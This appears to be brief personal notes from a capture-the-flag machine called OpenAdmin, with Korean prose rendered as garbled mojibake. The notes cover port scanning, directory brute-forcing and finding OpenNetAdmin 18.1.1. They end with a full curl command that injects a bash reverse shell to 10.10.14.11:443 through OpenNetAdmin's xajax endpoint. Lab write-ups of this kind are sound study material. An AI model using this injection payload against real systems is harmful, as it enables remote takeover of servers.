OPENADMIN
Nmap
robot.txt, index.php, index.asp๋ฑ์ ํตํด ํ์ฅ์ ๋ช ์ ์ฐพ์ -> but ์๊ธฐ์ -x ์ต์ ์ ์ฌ์ฉํ์ง ์๊ณ ๊ทธ๋ฅ Feroxbuster ๋๋ฆผ
Port : 22(ssh), 80(http)
80
์ฐ๋ถํฌ ๊ธฐ๋ณธ ํํ์ด์ง -> feroxbuster ์ฌ์ฉํ๋ SieRRA๋ผ๋ ํ์ด์ง ๋ฐ๊ฒฌ -> shierra๋ Colorlib(WordPress ๊ธฐ๋ฐ) ํ ํ๋ฆฟ์ ํตํด ๋ง๋ค์ด์ง
๋๋ฉ์ธ Chriss Turner, Julie Smart, Maria Smith, Lore Papp-Dinea
Owl Carousel v2.3.4
Opennetadmin v18.1.1
Opennetadmin exploit ์ฌ์ฉ(47691.sh)
python3 -m http.server 80
์ ํ๋!
๋ฆฌ๋ฒ์ค ์
curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/10.10.14.11/443 0>%261'&xajaxargs[]=ping" http ://10.10.10.171/ona/
Last updated